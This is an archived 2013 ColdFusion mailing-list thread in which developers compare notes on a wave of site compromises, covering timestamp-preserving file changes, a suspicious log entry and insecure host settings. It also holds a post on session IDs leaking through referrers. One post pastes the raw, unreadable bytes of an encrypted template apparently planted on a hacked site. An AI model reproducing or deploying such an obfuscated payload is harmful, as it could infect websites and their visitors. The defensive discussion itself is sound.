Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott

That would indicate that they where able to get the file stamp before
modifying it and reapplying the time stamp Extreme long shot, but who
knows how they are doing this.

-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


On Mon, Feb 11, 2013 at 4:43 PM, Les Mizzell  wrote:

>
>  > Still I am not sure how they are uploading these files
>  > as there is nothing in the logs that indicates this.
>
> For mine in the previous message, the altered file still had the
> ORIGINAL creation date on it - 2011 something - although it was altered
> last week. So, a search of all the site files for anything recently
> altered showed nothing.
>
> 

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354447
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell

 > Still I am not sure how they are uploading these files
 > as there is nothing in the logs that indicates this.

For mine in the previous message, the altered file still had the 
ORIGINAL creation date on it - 2011 something - although it was altered 
last week. So, a search of all the site files for anything recently 
altered showed nothing.

~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354446
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


Re: New Round of Exploits going on

2013-02-10 Thread Andrew Scott

One thing I hate about some hosting companies is that they have Robust
Exceptions switched on, but what concerns me even more is that they don't
care that this is a security risk... If your hosting company is one of
them, get in their ears about having it switched off.

If they refuse then its time for a change.

Also as a caution not a rule, if your lucky enough to have the time, look
into using any framework that supports MVC and SES rewrites, this has
stopped them in their tracks as they are not able to run the uploaded code.
Not with ease at least anyway.

Still I am not sure how they are uploading these files, as there is nothing
in the logs that indicates this. I am guessing that something else on the
server is compromised and because they are able to and do look for
exceptions being displayed to the screen they now know where to start
spreading their malware. My guess is there is an exploit still know and not
public that is bypassing all sand boxing at the moment.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354445
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


Re: New Round of Exploits going on

2013-02-10 Thread Les Mizzell

I just got the below on a site. Not sure how to decrypt to tell exactly 
what it's doing though.
Client noticed that Google had flagged the site as 'comprimised".

I'm pointing my finger at the hosting company - they've got a security 
issue if this can happen, correct?

So, anybody know what this is doing?

-

Allaire Cold Fusion Template
Header Size: New 
Version@ؤlº²BÊulYLöŠhqؤä8X°ɿÌò©‰P^qvßNÊ҇ùFÍû'ÉÊՔ¯Èe
ÜØúÄá”û!Çp$s㨒ôû”\v‰ù>eÐ×åRV/е ú{ 
/ý‡èó^t¼ɮ?žÝtnŠö”"³zñ¤î:XÌ֙Ó(ËÕÂ~)ۣ·Œ*‹ 
ì€ 
·mîQPêlœ­wré(²-ì˜~s ‡#ó(B]±nwÃí¸•a TGm­æHpOÕÏ-K©o+ÏE&$f*훆œv™ÔB¥¦fTm{$5fI>HpOÕ@¥ÉϚ~y`lÆjÃ0z\¸ÿꬃ©ô³¥pEߵÒ/HÊÝS¸¿-ؕ3úœ¼äU³ÐÁ׻áº8'¹ïVŒcKWN¡sdDg‘ÑùAjƒ¥×y³Õ¿°Ó{Kî®l‘XFLõR±,
 
•ñ*Þr„?ݮ—Év¬ì‘Íg¡$Â9„î®l‘XFLõR±, 
:6ôԸTœ¼}ÝbG¦`ðî¦fTm{$5fI>HpOÕ8`Ӆº2Öяÿ¬@àÎ}V|̽…
\¸ÿꬃ©ô³¥pEߵÒ/ŊԽæCϯ£’jKNö׻áº8'¹ïVŒcKWì¾ïNüÏ1¨--£s©s"K‹ðåW׻áº8'¹ïVŒcKWá?‹Í"Í›
 
X·TôÒ^©ª»`ͼ¿%V#‚6ŸÂ7Ì Â}£d
½¬p!²E¤ñߴdŠ`'8OYgՊ=â/n׻áº8'¹ïVŒcKWRÏ&¥t‘‘› 
X·fJc—lþ¸fͼ¿%V#‚6ŸÂ7Ì ‡ը
R,`Î޷M^Rœ¯ê}Oæ‘Ìͼ¿%V#‚6ŸÂ7Ì 
Íi7pԳ´¯ˆš¢ÿ*\¸ÿꬃ©ô³¥pEߵÒ/ðu§>½(OÍ祹Í3 
ÕpÓÜæ7\¸ÿꬃ©ô³¥pEߵÒ/gQ 
ú÷缋ýquv6Tž<Wܳ§›YªØåY~’›¡Xm»¸ã4ÿöèyoy@QvUcS`׻áº8'¹ïVŒcKWg“SáÑÓ›
 
X·Dü¥Ñíöͼ¿%V#‚6ŸÂ7Ì 
•#âvû±‰â>8³GԞ<Wܳ§›YªØåY~’›¡Xm»ʍƬ³š,}B½à
s­¦fTm{$5fI>HpOÕddÜ 
šµ'×l—˜ҽrm[,
Ìå;ò:WÄçåöbyœ©E 
¦¨Y!Æ#šÅ
YsK˜ُ;/׻áº8'¹ïVŒcKWŠˆyó±ý•:5IY4)ÄAý!x²Í׻áº8'¹ïVŒcKWCHpOՅ
ãDøS‹4C¬Û2£3†.­æHpOդa"ÏQz]¬[ç@ºÐìéfæ›.DÁgä/WÄçåöbyœ©EÂ
 
¦¨Yn.—‹ÉrHýSámí.Z׻áº8'¹ïVŒcKW»Ê.Hú®c:5IY4)Ä>4Çݪ'H—Nî®l‘XFLõR±,
 
¥ã‰J¥3Š±‹ŽTEWÄçåöbyœ©E 
¦¨YºùÞØÅ
ԩÈ[ÑîX¢EáYeÆlúîïlž<Wܳ§›YªØåc×S¶‹HI{±ñév<ø›9}¦
 _¦fTm{$5fI>HpOÕn˜aîó(Wœ†+úÞ 

¥N—Î\#ÆWÄçåöbyœ©E 
¦¨Y)‚ÂO>—ÇpÔ)æÞÆØ׻áº8'¹ïVŒcKWôåßAãåÑ:5IY4)Äß"J֔¥ô׻áº8'¹ïVŒcKWõºþðA\õ›
 
X·Ë!þFs¸!eͼ¿%V#‚6ŸÂ7Ì 
þﱕþw0wQЀQ”wGݑeSyǓð¯¦fTm{$5fI>HpOբSÄò 
¤qòðë–1ˆxO…­æ6lü“ƒ­æ†.œi­½$þ—*j9 
'‚¨ž<Wܳ§›YªØå«#}yµ'X<ΞQ¿(վ÷—åئfTm{$5fI>HpOÕÑjr$¿ßÓÀûI£ä£G
 
ër’‚}Û+Dž<Wܳ§›YªØå«#}yµ'X{±ñév<øTùdv§òi˜¦fTm{$5fI>HpOÕØî¯Tȯûk.1
 
L½ð¹ž<Wܳ§›YªØå«#}yµ'X:6ôԸTœ¼/*²-"¦fTm{$5fI>HpO՝²;É70yÎ\^«år‘ƒr2þOTWÄçåöbyœ©EÂ
 
¦¨Y5 w–Ëٞ
ÒóìyÞU2׻áº8'¹ïVŒcKWýº²´ˆ…
?:5IY4)ă^(·:;h­æHpOÕVa™ðR0äc€äÙcûër’‚}Û+Dž<Wܳ§›YªØÃ¥Ã
…
O“TFÀe„xœ)«%Pl8´4ÆþƦfTm{$5fI>HpOÕBœ8–ÉY¸EÓ½^ñtÚãÏxx‘³í\¸ÿꬃ©ô³¥pEߵÒ/¾ïb÷۸ùÝ(î‹Ι¤Vž<Wܳ§›YªØÃ¥Ã
…O“TFÀe„Ñ藒
„­ ûÌîX¬T­æøéGž<Wܳ§›YªØÃ¥Ã
…O“TFÀe„óԮ
)eмµãÚý3Ư+izR„=¦fTm{$5fI>HpOÕêÞM% 
>×IoAþ»ë­æ´wqèß?5i(¡Ëˆâ"JÊÈîÃ~|IMl™ÇTˆNȰÛS˜՘Ö5­›ï
¾Ëþöó(+@ÏGá:´•Z™,áj3PÒAÛgà¬p«,Nÿm{˜ö$ÛO@GÍûxK6 
ÙTΒ ]zs³➪ÄЧ
Lʆø.žSO$÷¦fTm{$5ùÍõ(µ횫EŸ؟3yƲ5G9l±ÕÆGüU–‘m¯
BA÷üYœI[!o§“¡Zc#Ý+Ö/ŸIxà
W댷“ñˆð¡å@u;òœ`·ºƒ¬ôe2༒Ü3µ5Hيbü‡BFL²WÇä0QÆ7Æ 
„›·×LõR±, 
Ïî¼́²=sʺçWÓÿZúDkˆ#ֶ‡Bäкvé1óYnÈÝ%½4ôÉsµ*›[¯½1¤ÛVQ
 $f¸»a_šZŠªETì+EKu•ÿP¥²Cà
¬C€ƒõD9­ÏqŸºäKã–9Éb\3:‹Əš94šÄDݿvR_y6hž
í®3h¹Dȅ(…F_:ºž<Wܳ’•¿ó„±ÚÇƓ
šéš̪¹p¦ÿg–Né=Š:Fђ`®ÿê
©©«›Â_™ÀÂñZa¯ڈg”âÞÞ&e̩z†4h¸‹™C*Q°ûÛð¶3Ú\
Žwîê©©«›Â_ÎñB&B”^´8WóÞñ®þ€‹ÏP3[f$áDX)6:‹u¶øX 
ßI¼)ÓËSõñ¸sa“V.(©¶-р7_(‹.ŠÁWÓáeñ,^qþTeºRÞ@;¿l³W©Á-Ö/ô÷4LÐFãct¢#Ž³žƒsœ¤§Ájª?A©WÄçåöbyÂV¬Ã
…3*|:Øê].B¹©ÿX1F;I¬Úw¿fw;Yk®ýkÎ8Ò*¬£È<ß'ŒŖɝPølG„Ðê
©©«›Â_G[¹sõf¡\V¬Å3*|:ƒ
Bö^Ÿ’®V/е úÞ-LËYiDöÍrUÈLÛÔì!Êa™6~Ÿ4¨3yܗ-îÚ
hºdqh=M`šQ¨Z°ÑWD¼k&œ¼1ŽŸkÉì+›}?VfÿڔA9Ëá
'ÂsÔ_Ÿ]‰c+*•uqÄöéû/@Ç^ú¬³ð.ç’覰5ûÀ0ž¥j
»u<·l³iþaÌüW{í–m¥†ħH*9°3¡%:
m¡äÂ]po݅¼ý3—Ûü0,N+‰Ùoeœ]ek¥ÝDeÐtÿ~,ÊïVÉYà
æŠ]UpTGƒÓ"\íæQxm™Å5+Šõ½û+Ò0•V<†ÿK 
@®ó1ÄBYÄíü–ÿ
×Ó@©„›@®ó1ÄBYÄíü–ÿ
vˍ›@òÆ~,ÊïVÉYàPnU¥œƊȥ, 
PÎˊõ½û+Ò0Šõ½û+Ò0

New Round of Exploits going on

2013-02-10 Thread Andrew Scott

It appears that there are either Web Developers running sites with current
infections, or there is a new round happening.

I have seen one site hacked twice in the last two weeks, and although they
were never able to run the code, there is very little evidence that this
exploit is from the web site it was found on.

However the one thing that I noticed in the logs at the time of the
modified HTML file, and yes they only modified HTML files and not CFML
files, was that I found a HEAD request in the logs that came from a website
that looked suspicious. When I googled this domain my AntiVirus detected
this as a Black Hole Security Exploit, but what was worrying was that this
log with the domain had the website that was hacked in the log. And it
looks like this with the details changed to protect both parties.

2013-02-06 01:43:48 xxx.xxx.xxx.xxx HEAD / - 80 - xxx.xxx.xxx.xxx
Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:18.0)+Gecko/20100101+Firefox/18.0
http://somedomain/?info/d 
omainattacked 301 0 0 225 432 125

Now you can see that this was redirected, but if there is a known exploit
these guys are still able to do this. As was evident with the latest
Anonymous attacks.

I encourage people to look at their websites and check to see if they have
been infected with this new wave. I have gone through the logs of the
website in question and there is no evidence that it was infected directly
through the website, except for that one line in the log mentioned above.

What really shocks me even more, is that the hosting company refuse
to acknowledge that they may be responsible, which is fair enough if this
website did not have all the checks to sanitize all form inputs with Anti
Sammy. And there is also no evidence that this a SQL Injected attack
either, which is near impossible unless there is a known bug with hibernate
and its current binding of variables. Aka cfqueryparam for hibernate.

Anyway as some people have mentioned that they have been attacked in the
last few weeks, I wanted to share this as there seems to be a new exploit
going around that may or may not be related to ColdFusion on shared hosts,
but they seem to not care who they are infecting.


-- 
Regards,
Andrew Scott
WebSite: http://www.andyscott.id.au/
Google+:  http://plus.google.com/113032480415921517411


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354443
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm


Re: Anyway to automatically convert to URLSESSIONFORMAT

2013-02-10 Thread Cameron Childress

On Sat, Feb 9, 2013 at 7:55 PM, UXB  wrote:

> From a security perspective cookies are a better option because passing
> ID's in the open can result in session hijacking when someone bookmarks a
> link.
>

This isn't even the biggest threat. Since you are passing the SessionID in
the URL, it will be included in the referrer string and LOGGED by someone
else's server each time you allow a link out from your website. This
appears to be the root cause of the recent Yahoo Mail security breaches.

This means if you simply link to my website from yours, using a plain jane
link - this is all that is required for me to potentially hijack your
user's sessions, simply by examining the referrer strings.

-Cameron

-- 
Cameron Childress
--
p:   678.637.5072
im: cameroncf
facebook  |
twitter |
google+ 


~|
Order the Adobe Coldfusion Anthology now!
http://www.amazon.com/Adobe-Coldfusion-Anthology/dp/1430272155/?tag=houseoffusion
Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:354442
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/groups/cf-talk/unsubscribe.cfm